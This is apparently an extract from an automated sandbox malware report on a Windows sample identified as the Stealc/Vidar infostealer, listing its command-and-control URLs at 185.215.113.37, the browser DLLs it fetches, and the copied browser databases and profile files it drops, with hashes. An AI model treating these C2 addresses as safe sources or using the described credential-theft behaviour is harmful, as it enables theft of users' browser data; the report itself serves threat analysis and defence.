https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllS	file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.php_url	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpe_las	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpASCA	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1794800127.000000001D64C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll=	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllH	file.exe, 00000000.00000002.1934685574.0000000001364000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t	file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpNTEGEG	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllEQ	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllWQ-	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll3Q	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll/Qe	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpFirefox	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpmainnet	file.exe, 00000000.00000002.1934685574.0000000001378000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org	EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1530966
Start date and time:	2024-10-10 18:22:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 75 Number of non-executed functions: 52
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	hlyG1m5UmO.exe	Get hash	malicious	Stealc, Vidar	Browse
	rmuVYJo33r.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	2efOvyn28p.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	hlyG1m5UmO.exe	Get hash	malicious	Stealc, Vidar	Browse
	rmuVYJo33r.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	2efOvyn28p.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEGHJKJKKJDHIDHJKJDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBFBGCGIJKJJKFIDBFCG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGCFHIDAKECFHIEBFCGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\ECAKECAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGHJKJKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGHJKJKKJDHIDHJKJDBGCGCBAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKEGIDGDGHCAAAAKKFCGDAFIIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEHDHIDAEHCFHJJJJECAAFBKJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: hlyG1m5UmO.exe, Detection: malicious, Browse Filename: rmuVYJo33r.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 2efOvyn28p.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: hlyG1m5UmO.exe, Detection: malicious, Browse Filename: rmuVYJo33r.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 2efOvyn28p.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
